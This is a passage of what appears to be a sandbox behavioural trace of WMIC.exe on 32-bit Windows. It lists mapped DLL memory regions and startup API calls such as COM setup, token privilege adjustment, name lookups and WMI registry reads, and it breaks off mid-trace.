entry_point = 0x77670000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 2202 start_va = 0x77a10000 end_va = 0x77acdfff entry_point = 0x77a10000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 2203 start_va = 0x77ad0000 end_va = 0x77ad6fff entry_point = 0x77ad0000 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\SysWOW64\\nsi.dll" (normalized: "c:\\windows\\syswow64\\nsi.dll") Region: id = 2204 start_va = 0x77af0000 end_va = 0x77b9bfff entry_point = 0x77af0000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\SysWOW64\\rpcrt4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll") Region: id = 2205 start_va = 0x7efd0000 end_va = 0x7f0cffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efd0000" filename = "" Region: id = 2206 start_va = 0x7f0f7000 end_va = 0x7f0f9fff entry_point = 0x0 region_type = private name = "private_0x000000007f0f7000" filename = "" Region: id = 2207 start_va = 0x76f60000 end_va = 0x76f6bfff entry_point = 0x76f60000 region_type = mapped_file name = "kernel.appcore.dll" filename = "\\Windows\\SysWOW64\\kernel.appcore.dll" (normalized: "c:\\windows\\syswow64\\kernel.appcore.dll") Region: id = 2208 start_va = 0x8a0000 end_va = 0x8a0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000008a0000" filename = "" Region: id = 2209 start_va = 0x77760000 end_va = 0x777e1fff entry_point = 0x77760000 region_type = mapped_file name = "clbcatq.dll" filename = "\\Windows\\SysWOW64\\clbcatq.dll" (normalized: "c:\\windows\\syswow64\\clbcatq.dll") Region: id = 2210 start_va = 0xad0000 end_va = 0xad0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000ad0000" filename = "" Region: id = 2211 start_va = 0x74a20000 end_va = 0x74a2cfff entry_point = 0x74a20000 region_type = mapped_file name = "wbemprox.dll" filename = "\\Windows\\SysWOW64\\wbem\\wbemprox.dll" (normalized: "c:\\windows\\syswow64\\wbem\\wbemprox.dll") Region: id = 2212 start_va = 0x77930000 end_va = 0x7798bfff entry_point = 0x77930000 region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\SysWOW64\\ws2_32.dll" (normalized: "c:\\windows\\syswow64\\ws2_32.dll") Region: id = 2213 start_va = 0x749b0000 end_va = 0x74a15fff entry_point = 0x749b0000 region_type = mapped_file name = "wbemcomn.dll" filename = "\\Windows\\SysWOW64\\wbemcomn.dll" (normalized: "c:\\windows\\syswow64\\wbemcomn.dll") Region: id = 2214 start_va = 0x74af0000 end_va = 0x74b0afff entry_point = 0x74af0000 region_type = mapped_file name = "bcrypt.dll" filename = "\\Windows\\SysWOW64\\bcrypt.dll" (normalized: "c:\\windows\\syswow64\\bcrypt.dll") Region: id = 2215 start_va = 0xcf0000 end_va = 0x1026fff entry_point = 0xcf0000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 2216 start_va = 0x77ba0000 end_va = 0x77c31fff entry_point = 0x77ba0000 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\SysWOW64\\oleaut32.dll" (normalized: "c:\\windows\\syswow64\\oleaut32.dll") Region: id = 2217 start_va = 0x1030000 end_va = 0x1118fff entry_point = 0x1030000 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\SysWOW64\\ole32.dll" (normalized: "c:\\windows\\syswow64\\ole32.dll") Region: id = 2218 start_va = 0xae0000 end_va = 0xae3fff entry_point = 0x0 region_type = private name = "private_0x0000000000ae0000" filename = "" Region: id = 2219 start_va = 0x74820000 end_va = 0x749affff entry_point = 0x74820000 region_type = mapped_file name = "msxml3.dll" filename = "\\Windows\\SysWOW64\\msxml3.dll" (normalized: "c:\\windows\\syswow64\\msxml3.dll") Region: id = 2220 start_va = 0xaf0000 end_va = 0xb1ffff entry_point = 0x0 region_type = private name = "private_0x0000000000af0000" filename = "" Region: id = 2221 start_va = 0x1030000 end_va = 0x110ffff entry_point = 0x0 region_type = private name = "private_0x0000000001030000" filename = "" Region: id = 2222 start_va = 0xb40000 end_va = 0xbeffff entry_point = 0x0 region_type = private name = "private_0x0000000000b40000" filename = "" Region: id = 2223 start_va = 0xb40000 end_va = 0xb6ffff entry_point = 0x0 region_type = private name = "private_0x0000000000b40000" filename = "" Region: id = 2224 start_va = 0xbe0000 end_va = 0xbeffff entry_point = 0x0 region_type = private name = "private_0x0000000000be0000" filename = "" Region: id = 2225 start_va = 0xaf0000 end_va = 0xb0ffff entry_point = 0x0 region_type = private name = "private_0x0000000000af0000" filename = "" Region: id = 2226 start_va = 0xb10000 end_va = 0xb1ffff entry_point = 0x0 region_type = private name = "private_0x0000000000b10000" filename = "" Region: id = 2227 start_va = 0x1110000 end_va = 0x11eefff entry_point = 0x1110000 region_type = mapped_file name = "kernelbase.dll.mui" filename = "\\Windows\\SysWOW64\\en-US\\KernelBase.dll.mui" (normalized: "c:\\windows\\syswow64\\en-us\\kernelbase.dll.mui") Region: id = 2228 start_va = 0x5370000 end_va = 0x576ffff entry_point = 0x0 region_type = private name = "private_0x0000000005370000" filename = "" Region: id = 2229 start_va = 0xaf0000 end_va = 0xaf0fff entry_point = 0xaf0000 region_type = mapped_file name = "msxml3r.dll" filename = "\\Windows\\SysWOW64\\msxml3r.dll" (normalized: "c:\\windows\\syswow64\\msxml3r.dll") Region: id = 2230 start_va = 0xb00000 end_va = 0xb0ffff entry_point = 0x0 region_type = private name = "private_0x0000000000b00000" filename = "" Region: id = 2231 start_va = 0xb40000 end_va = 0xb5ffff entry_point = 0x0 region_type = private name = "private_0x0000000000b40000" filename = "" Region: id = 2232 start_va = 0xb60000 end_va = 0xb6ffff entry_point = 0x0 region_type = private name = "private_0x0000000000b60000" filename = "" Region: id = 2233 start_va = 0x746c0000 end_va = 0x7481ffff entry_point = 0x746c0000 region_type = mapped_file name = "urlmon.dll" filename = "\\Windows\\SysWOW64\\urlmon.dll" (normalized: "c:\\windows\\syswow64\\urlmon.dll") Region: id = 2234 start_va = 0x77990000 end_va = 0x77a0afff entry_point = 0x77990000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\SysWOW64\\advapi32.dll" (normalized: "c:\\windows\\syswow64\\advapi32.dll") Region: id = 2235 start_va = 0x778a0000 end_va = 0x7792cfff entry_point = 0x778a0000 region_type = mapped_file name = "shcore.dll" filename = "\\Windows\\SysWOW64\\SHCore.dll" (normalized: "c:\\windows\\syswow64\\shcore.dll") Region: id = 2236 start_va = 0x75080000 end_va = 0x750c3fff entry_point = 0x75080000 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\SysWOW64\\shlwapi.dll" (normalized: "c:\\windows\\syswow64\\shlwapi.dll") Region: id = 2237 start_va = 0x76ca0000 end_va = 0x76decfff entry_point = 0x76ca0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\SysWOW64\\gdi32.dll" (normalized: "c:\\windows\\syswow64\\gdi32.dll") Region: id = 2238 start_va = 0x74d70000 end_va = 0x74eaffff entry_point = 0x74d70000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\SysWOW64\\user32.dll" (normalized: "c:\\windows\\syswow64\\user32.dll") Region: id = 2239 start_va = 0x743f0000 end_va = 0x746b0fff entry_point = 0x743f0000 region_type = mapped_file name = "iertutil.dll" filename = "\\Windows\\SysWOW64\\iertutil.dll" (normalized: "c:\\windows\\syswow64\\iertutil.dll") Region: id = 2240 start_va = 0xb70000 end_va = 0xb99fff entry_point = 0xb70000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 2241 start_va = 0x5770000 end_va = 0x58f7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000005770000" filename = "" Region: id = 2242 start_va = 0x775e0000 end_va = 0x7760afff entry_point = 0x775e0000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 2243 start_va = 0x76f70000 end_va = 0x7708ffff entry_point = 0x76f70000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\SysWOW64\\msctf.dll" (normalized: "c:\\windows\\syswow64\\msctf.dll") Region: id = 2244 start_va = 0xb20000 end_va = 0xb2ffff entry_point = 0xb20000 region_type = mapped_file name = "wmic.exe.mui" filename = "\\Windows\\SysWOW64\\wbem\\en-US\\WMIC.exe.mui" (normalized: "c:\\windows\\syswow64\\wbem\\en-us\\wmic.exe.mui") Region: id = 2245 start_va = 0x5900000 end_va = 0x5a80fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000005900000" filename = "" Region: id = 2246 start_va = 0x5a90000 end_va = 0x6e8ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000005a90000" filename = "" Region: id = 2247 start_va = 0xb70000 end_va = 0xb70fff entry_point = 0x0 region_type = private name = "private_0x0000000000b70000" filename = "" Region: id = 2248 start_va = 0xb80000 end_va = 0xb80fff entry_point = 0x0 region_type = private name = "private_0x0000000000b80000" filename = "" Region: id = 2249 start_va = 0x741c0000 end_va = 0x743e3fff entry_point = 0x741c0000 region_type = mapped_file name = "wininet.dll" filename = "\\Windows\\SysWOW64\\wininet.dll" (normalized: "c:\\windows\\syswow64\\wininet.dll") Region: id = 2250 start_va = 0x77430000 end_va = 0x77519fff entry_point = 0x77430000 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\SysWOW64\\ole32.dll" (normalized: "c:\\windows\\syswow64\\ole32.dll") Region: id = 2251 start_va = 0x74bc0000 end_va = 0x74c34fff entry_point = 0x74bc0000 region_type = mapped_file name = "uxtheme.dll" filename = "\\Windows\\SysWOW64\\uxtheme.dll" (normalized: "c:\\windows\\syswow64\\uxtheme.dll") Region: id = 2252 start_va = 0xb90000 end_va = 0xb9ffff entry_point = 0x0 region_type = private name = "private_0x0000000000b90000" filename = "" Region: id = 2253 start_va = 0xba0000 end_va = 0xba0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000ba0000" filename = "" Region: id = 2254 start_va = 0x1030000 end_va = 0x10e7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001030000" filename = "" Region: id = 2255 start_va = 0x1100000 end_va = 0x110ffff entry_point = 0x0 region_type = private name = "private_0x0000000001100000" filename = "" Region: id = 2256 start_va = 0xba0000 end_va = 0xba3fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000ba0000" filename = "" Region: id = 2257 start_va = 0x74ba0000 end_va = 0x74bbcfff entry_point = 0x74ba0000 region_type = mapped_file name = "dwmapi.dll" filename = "\\Windows\\SysWOW64\\dwmapi.dll" (normalized: "c:\\windows\\syswow64\\dwmapi.dll") Region: id = 2258 start_va = 0x11f0000 end_va = 0x12effff entry_point = 0x0 region_type = private name = "private_0x00000000011f0000" filename = "" Region: id = 2259 start_va = 0x74aa0000 end_va = 0x74ab2fff entry_point = 0x74aa0000 region_type = mapped_file name = "cryptsp.dll" filename = "\\Windows\\SysWOW64\\cryptsp.dll" (normalized: "c:\\windows\\syswow64\\cryptsp.dll") Region: id = 2260 start_va = 0x74a70000 end_va = 0x74a9efff entry_point = 0x74a70000 region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\SysWOW64\\rsaenh.dll" (normalized: "c:\\windows\\syswow64\\rsaenh.dll") Region: id = 2261 start_va = 0x6e90000 end_va = 0x6ecffff entry_point = 0x0 region_type = private name = "private_0x0000000006e90000" filename = "" Region: id = 2262 start_va = 0x6ed0000 end_va = 0x6f0ffff entry_point = 0x0 region_type = private name = "private_0x0000000006ed0000" filename = "" Region: id = 2263 start_va = 0x6f10000 end_va = 0x6f4ffff entry_point = 0x0 region_type = private name = "private_0x0000000006f10000" filename = "" Region: id = 2264 start_va = 0x6f50000 end_va = 0x6f8ffff entry_point = 0x0 region_type = private name = "private_0x0000000006f50000" filename = "" Region: id = 2265 start_va = 0x6f90000 end_va = 0x6fcffff entry_point = 0x0 region_type = private name = "private_0x0000000006f90000" filename = "" Region: id = 2266 start_va = 0x6fd0000 end_va = 0x700ffff entry_point = 0x0 region_type = private name = "private_0x0000000006fd0000" filename = "" Region: id = 2267 start_va = 0x7efca000 end_va = 0x7efccfff entry_point = 0x0 region_type = private name = "private_0x000000007efca000" filename = "" Region: id = 2268 start_va = 0x7efcd000 end_va = 0x7efcffff entry_point = 0x0 region_type = private name = "private_0x000000007efcd000" filename = "" Region: id = 2269 start_va = 0x7f0f4000 end_va = 0x7f0f6fff entry_point = 0x0 region_type = private name = "private_0x000000007f0f4000" filename = "" Region: id = 2270 start_va = 0x741a0000 end_va = 0x741b0fff entry_point = 0x741a0000 region_type = mapped_file name = "wbemsvc.dll" filename = "\\Windows\\SysWOW64\\wbem\\wbemsvc.dll" (normalized: "c:\\windows\\syswow64\\wbem\\wbemsvc.dll") Region: id = 2271 start_va = 0x740e0000 end_va = 0x7419bfff entry_point = 0x740e0000 region_type = mapped_file name = "fastprox.dll" filename = "\\Windows\\SysWOW64\\wbem\\fastprox.dll" (normalized: "c:\\windows\\syswow64\\wbem\\fastprox.dll") Region: id = 2272 start_va = 0xbb0000 end_va = 0xbc4fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000bb0000" filename = "" Region: id = 2273 start_va = 0xbb0000 end_va = 0xbd8fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000bb0000" filename = "" Thread: id = 176 os_tid = 0xd38 [0106.752] GetModuleHandleA (lpModuleName=0x0) returned 0x1300000 [0106.752] __set_app_type (_Type=0x1) [0106.752] __p__fmode () returned 0x77ac4d6c [0106.752] __p__commode () returned 0x77ac5b1c [0106.752] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x133aa90) returned 0x0 [0106.752] __wgetmainargs (in: _Argc=0x13491a8, _Argv=0x13491ac, _Env=0x13491b0, _DoWildCard=0, _StartInfo=0x13491bc | out: _Argc=0x13491a8, _Argv=0x13491ac, _Env=0x13491b0) returned 0 [0106.753] ??0CHString@@QAE@XZ () returned 0x13495ec [0106.753] ??0CHString@@QAE@XZ () returned 0x13498fc [0106.753] ?Empty@CHString@@QAEXXZ () returned 0x74a66424 [0106.753] SetConsoleCtrlHandler (HandlerRoutine=0x1334980, Add=1) returned 1 [0106.753] _onexit (_Func=0x1340a20) returned 0x1340a20 [0106.753] _onexit (_Func=0x1340a30) returned 0x1340a30 [0106.753] _onexit (_Func=0x1340a50) returned 0x1340a50 [0106.754] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0106.754] ResolveDelayLoadedAPI () returned 0x770fcd50 [0106.754] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0 [0106.755] CoInitializeSecurity (pSecDesc=0x0, cAuthSvc=-1, asAuthSvc=0x0, pReserved1=0x0, dwAuthnLevel=0x1, dwImpLevel=0x3, pAuthList=0x0, dwCapabilities=0x0, pReserved3=0x0) returned 0x0 [0106.761] CoCreateInstance (in: rclsid=0x1306a1c*(Data1=0x4590f811, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), pUnkOuter=0x0, dwClsContext=0x1, riid=0x1306a2c*(Data1=0xdc12a687, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppv=0x1349510 | out: ppv=0x1349510*=0xbf8050) returned 0x0 [0106.770] GetCurrentProcess () returned 0xffffffff [0106.770] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x28, TokenHandle=0x94fa6c | out: TokenHandle=0x94fa6c*=0x158) returned 1 [0106.770] GetTokenInformation (in: TokenHandle=0x158, TokenInformationClass=0x3, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x94fa68 | out: TokenInformation=0x0, ReturnLength=0x94fa68) returned 0 [0106.770] GetTokenInformation (in: TokenHandle=0x158, TokenInformationClass=0x3, TokenInformation=0xb33a08, TokenInformationLength=0x118, ReturnLength=0x94fa68 | out: TokenInformation=0xb33a08, ReturnLength=0x94fa68) returned 1 [0106.771] AdjustTokenPrivileges (in: TokenHandle=0x158, DisableAllPrivileges=0, NewState=0xb33a08*(PrivilegesCount=0x17, Privileges=((Luid.LowPart=0x5, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x8, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x9, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0xa, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0xb, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0xc, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0xd, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0xe, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0xf, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x11, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x12, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x13, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x14, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x16, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x17, Luid.HighPart=0, Attributes=0x3), (Luid.LowPart=0x18, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x19, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x1c, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x1d, Luid.HighPart=0, Attributes=0x3), (Luid.LowPart=0x1e, Luid.HighPart=0, Attributes=0x3), (Luid.LowPart=0x21, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x22, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x23, Luid.HighPart=0, Attributes=0x2))), BufferLength=0x0, PreviousState=0x0, ReturnLength=0x0 | out: PreviousState=0x0, ReturnLength=0x0) returned 1 [0106.771] CloseHandle (hObject=0x158) returned 1 [0106.771] SetThreadUILanguage (LangId=0x0) returned 0x409 [0106.773] _vsnwprintf (in: _Buffer=0xb33a98, _BufferCount=0x1f, _Format="ms_%x", _ArgList=0x94f9f4 | out: _Buffer="ms_409") returned 6 [0106.773] GetComputerNameW (in: lpBuffer=0xb33ae0, nSize=0x94fa58 | out: lpBuffer="LHNIWSJ", nSize=0x94fa58) returned 1 [0106.773] lstrlenW (lpString="LHNIWSJ") returned 7 [0106.773] lstrlenW (lpString="LHNIWSJ") returned 7 [0106.773] ResolveDelayLoadedAPI () returned 0x74d5c5f0 [0106.773] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x0, nSize=0x94fa6c | out: lpNameBuffer=0x0, nSize=0x94fa6c) returned 0x0 [0106.774] GetLastError () returned 0xea [0106.774] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0xb33b20, nSize=0x94fa6c | out: lpNameBuffer="LHNIWSJ\\CIiHmnxMn6Ps", nSize=0x94fa6c) returned 0x1 [0106.774] lstrlenW (lpString="") returned 0 [0106.774] lstrlenW (lpString="LHNIWSJ") returned 7 [0106.774] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="LHNIWSJ", cchCount1=7, lpString2="", cchCount2=0) returned 3 [0106.776] lstrlenW (lpString=".") returned 1 [0106.776] lstrlenW (lpString="LHNIWSJ") returned 7 [0106.776] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="LHNIWSJ", cchCount1=7, lpString2=".", cchCount2=1) returned 3 [0106.776] lstrlenW (lpString="LOCALHOST") returned 9 [0106.776] lstrlenW (lpString="LHNIWSJ") returned 7 [0106.776] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="LHNIWSJ", cchCount1=7, lpString2="LOCALHOST", cchCount2=9) returned 1 [0106.776] lstrlenW (lpString="LHNIWSJ") returned 7 [0106.776] lstrlenW (lpString="LHNIWSJ") returned 7 [0106.776] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="LHNIWSJ", cchCount1=7, lpString2="LHNIWSJ", cchCount2=7) returned 2 [0106.776] lstrlenW (lpString="LHNIWSJ") returned 7 [0106.776] lstrlenW (lpString="LHNIWSJ") returned 7 [0106.776] lstrlenW (lpString="LHNIWSJ") returned 7 [0106.776] lstrlenW (lpString="LHNIWSJ") returned 7 [0106.776] ResolveDelayLoadedAPI () returned 0x77bb9840 [0106.778] SysStringLen (param_1="IDENTIFY") returned 0x8 [0106.778] SysStringLen (param_1="ANONYMOUS") returned 0x9 [0106.778] SysStringLen (param_1="ANONYMOUS") returned 0x9 [0106.778] SysStringLen (param_1="IDENTIFY") returned 0x8 [0106.778] SysStringLen (param_1="IMPERSONATE") returned 0xb [0106.778] SysStringLen (param_1="ANONYMOUS") returned 0x9 [0106.778] SysStringLen (param_1="IMPERSONATE") returned 0xb [0106.778] SysStringLen (param_1="IDENTIFY") returned 0x8 [0106.778] SysStringLen (param_1="IDENTIFY") returned 0x8 [0106.778] SysStringLen (param_1="IMPERSONATE") returned 0xb [0106.778] SysStringLen (param_1="DELEGATE") returned 0x8 [0106.778] SysStringLen (param_1="IDENTIFY") returned 0x8 [0106.778] SysStringLen (param_1="DELEGATE") returned 0x8 [0106.778] SysStringLen (param_1="ANONYMOUS") returned 0x9 [0106.778] SysStringLen (param_1="ANONYMOUS") returned 0x9 [0106.778] SysStringLen (param_1="DELEGATE") returned 0x8 [0106.778] SysStringLen (param_1="NONE") returned 0x4 [0106.778] SysStringLen (param_1="DEFAULT") returned 0x7 [0106.778] SysStringLen (param_1="DEFAULT") returned 0x7 [0106.778] SysStringLen (param_1="NONE") returned 0x4 [0106.778] SysStringLen (param_1="CONNECT") returned 0x7 [0106.778] SysStringLen (param_1="DEFAULT") returned 0x7 [0106.779] SysStringLen (param_1="CALL") returned 0x4 [0106.779] SysStringLen (param_1="DEFAULT") returned 0x7 [0106.779] SysStringLen (param_1="CALL") returned 0x4 [0106.779] SysStringLen (param_1="CONNECT") returned 0x7 [0106.779] SysStringLen (param_1="PKT") returned 0x3 [0106.779] SysStringLen (param_1="DEFAULT") returned 0x7 [0106.779] SysStringLen (param_1="PKT") returned 0x3 [0106.779] SysStringLen (param_1="NONE") returned 0x4 [0106.779] SysStringLen (param_1="NONE") returned 0x4 [0106.779] SysStringLen (param_1="PKT") returned 0x3 [0106.779] SysStringLen (param_1="PKTINTEGRITY") returned 0xc [0106.779] SysStringLen (param_1="DEFAULT") returned 0x7 [0106.779] SysStringLen (param_1="PKTINTEGRITY") returned 0xc [0106.779] SysStringLen (param_1="NONE") returned 0x4 [0106.779] SysStringLen (param_1="PKTINTEGRITY") returned 0xc [0106.779] SysStringLen (param_1="PKT") returned 0x3 [0106.779] SysStringLen (param_1="PKT") returned 0x3 [0106.779] SysStringLen (param_1="PKTINTEGRITY") returned 0xc [0106.779] SysStringLen (param_1="PKTPRIVACY") returned 0xa [0106.779] SysStringLen (param_1="DEFAULT") returned 0x7 [0106.779] SysStringLen (param_1="PKTPRIVACY") returned 0xa [0106.779] SysStringLen (param_1="PKT") returned 0x3 [0106.779] SysStringLen (param_1="PKTPRIVACY") returned 0xa [0106.779] SysStringLen (param_1="PKTINTEGRITY") returned 0xc [0106.779] SysStringLen (param_1="PKTINTEGRITY") returned 0xc [0106.779] SysStringLen (param_1="PKTPRIVACY") returned 0xa [0106.779] GetSystemDirectoryW (in: lpBuffer=0xb329d8, uSize=0x105 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0106.780] SysStringLen (param_1="C:\\Windows\\system32") returned 0x13 [0106.780] SysStringLen (param_1="\\wbem\\") returned 0x6 [0106.780] SysStringByteLen (bstr="C:\\Windows\\system32\\wbem\\") returned 0x32 [0106.780] SysStringLen (param_1="C:\\Windows\\system32\\wbem\\") returned 0x19 [0106.780] SysStringLen (param_1="XSL-Mappings.xml") returned 0x10 [0106.780] GetCurrentThreadId () returned 0xd38 [0106.780] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\Wbem\\CIMOM", ulOptions=0x0, samDesired=0x1, phkResult=0x94f57c | out: phkResult=0x94f57c*=0x164) returned 0x0 [0106.780] RegQueryValueExW (in: hKey=0x164, lpValueName="Logging", lpReserved=0x0, lpType=0x0, lpData=0x94f588, lpcbData=0x94f584*=0x400 | out: lpType=0x0, lpData=0x94f588*=0x30, lpcbData=0x94f584*=0x4) returned 0x0 [0106.780] _wcsicmp (_String1="0", _String2="1") returned -1 [0106.780] _wcsicmp (_String1="0", _String2="2") returned -2 [0106.780] RegQueryValueExW (in: hKey=0x164, lpValueName="Logging Directory", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x94f584*=0x4 | out: lpType=0x0, lpData=0x0, lpcbData=0x94f584*=0x42) returned 0x0 [0106.780] RegQueryValueExW (in: hKey=0x164, lpValueName="Logging Directory", lpReserved=0x0, lpType=0x0, lpData=0xb32be0, lpcbData=0x94f584*=0x42 | out: lpType=0x0, lpData=0xb32be0*=0x25, lpcbData=0x94f584*=0x42) returned 0x0 [0106.780] lstrlenW (lpString="%systemroot%\\system32\\wbem\\Logs\\") returned 32 [0106.780] lstrlenW (lpString="%systemroot%\\system32\\wbem\\Logs\\") returned 32 [0106.780] RegQueryValueExW (in: hKey=0x164, lpValueName="Log File Max Size", lpReserved=0x0, lpType=0x0, lpData=0x94f588, lpcbData=0x94f584*=0x400 | out: lpType=0x0, lpData=0x94f588*=0x36, lpcbData=0x94f584*=0xc) returned 0x0 [0106.780] _wtol (_String="65536") returned 65536 [0106.780] RegCloseKey (hKey=0x0) returned 0x6 [0106.780] CoCreateInstance (in: rclsid=0x1306a7c*(Data1=0xf6d90f12, Data2=0x9c73, Data3=0x11d3, Data4=([0]=0xb3, [1]=0x2e, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0xb, [7]=0xb4)), pUnkOuter=0x0, dwClsContext=0x1, riid=0x1306a8c*(Data1=0x2933bf95, Data2=0x7b36, Data3=0x11d2, Data4=([0]=0xb2, [1]=0xe, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x98, [6]=0x3e, [7]=0x60)), ppv=0x94fa1c | out: ppv=0x94fa1c*=0xb145a8) returned 0x0 [0106.789] FreeThreadedDOMDocument:IXMLDOMDocument:Load (in: This=0xb145a8, xmlSource=0x94f99c*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="C:\\Windows\\system32\\wbem\\XSL-Mappings.xml", varVal2=0x0), isSuccessful=0x94fa00 | out: isSuccessful=0x94fa00*=0xffff) returned 0x0 [0106.840] FreeThreadedDOMDocument:IXMLDOMDocument:get_documentElement (in: This=0xb145a8, DOMElement=0x94fa14 | out: DOMElement=0x94fa14) returned 0x0 [0106.841] SysStringLen (param_1="VALUE") returned 0x5 [0106.841] SysStringLen (param_1="TABLE") returned 0x5 [0106.841] SysStringLen (param_1="TABLE") returned 0x5 [0106.841] SysStringLen (param_1="VALUE") returned 0x5 [0106.841] SysStringLen (param_1="LIST") returned 0x4 [0106.841] SysStringLen (param_1="TABLE") returned 0x5 [0106.842] SysStringLen (param_1="RAWXML") returned 0x6 [0106.842] SysStringLen (param_1="TABLE") returned 0x5 [0106.842] SysStringLen (param_1="RAWXML") returned 0x6 [0106.842] SysStringLen (param_1="LIST") returned 0x4 [0106.842] SysStringLen (param_1="LIST") returned 0x4 [0106.842] SysStringLen (param_1="RAWXML") returned 0x6 [0106.842] SysStringLen (param_1="HTABLE") returned 0x6 [0106.842] SysStringLen (param_1="TABLE") returned 0x5 [0106.842] SysStringLen (param_1="HTABLE") returned 0x6 [0106.842] SysStringLen (param_1="LIST") returned 0x4 [0106.843] SysStringLen (param_1="HFORM") returned 0x5 [0106.843] SysStringLen (param_1="TABLE") returned 0x5 [0106.843] SysStringLen (param_1="HFORM") returned 0x5 [0106.843] SysStringLen (param_1="LIST") returned 0x4 [0106.843] SysStringLen (param_1="HFORM") returned 0x5 [0106.843] SysStringLen (param_1="HTABLE") returned 0x6 [0106.843] SysStringLen (param_1="XML") returned 0x3 [0106.843] SysStringLen (param_1="TABLE") returned 0x5 [0106.843] SysStringLen (param_1="XML") returned 0x3 [0106.843] SysStringLen (param_1="VALUE") returned 0x5 [0106.843] SysStringLen (param_1="VALUE") returned 0x5 [0106.843] SysStringLen (param_1="XML") returned 0x3 [0106.843] SysStringLen (param_1="MOF") returned 0x3 [0106.844] SysStringLen (param_1="TABLE") returned 0x5 [0106.844] SysStringLen (param_1="MOF") returned 0x3 [0106.844] SysStringLen (param_1="LIST") returned 0x4 [0106.844] SysStringLen (param_1="MOF") returned 0x3 [0106.844] SysStringLen (param_1="RAWXML") returned 0x6 [0106.844] SysStringLen (param_1="LIST") returned 0x4 [0106.844] SysStringLen (param_1="MOF") returned 0x3 [0106.844] SysStringLen (param_1="CSV") returned 0x3 [0106.844] SysStringLen (param_1="TABLE") returned 0x5 [0106.844] SysStringLen (param_1="CSV") returned 0x3 [0106.844] SysStringLen (param_1="LIST") returned 0x4 [0106.844] SysStringLen (param_1="CSV") returned 0x3 [0106.844] 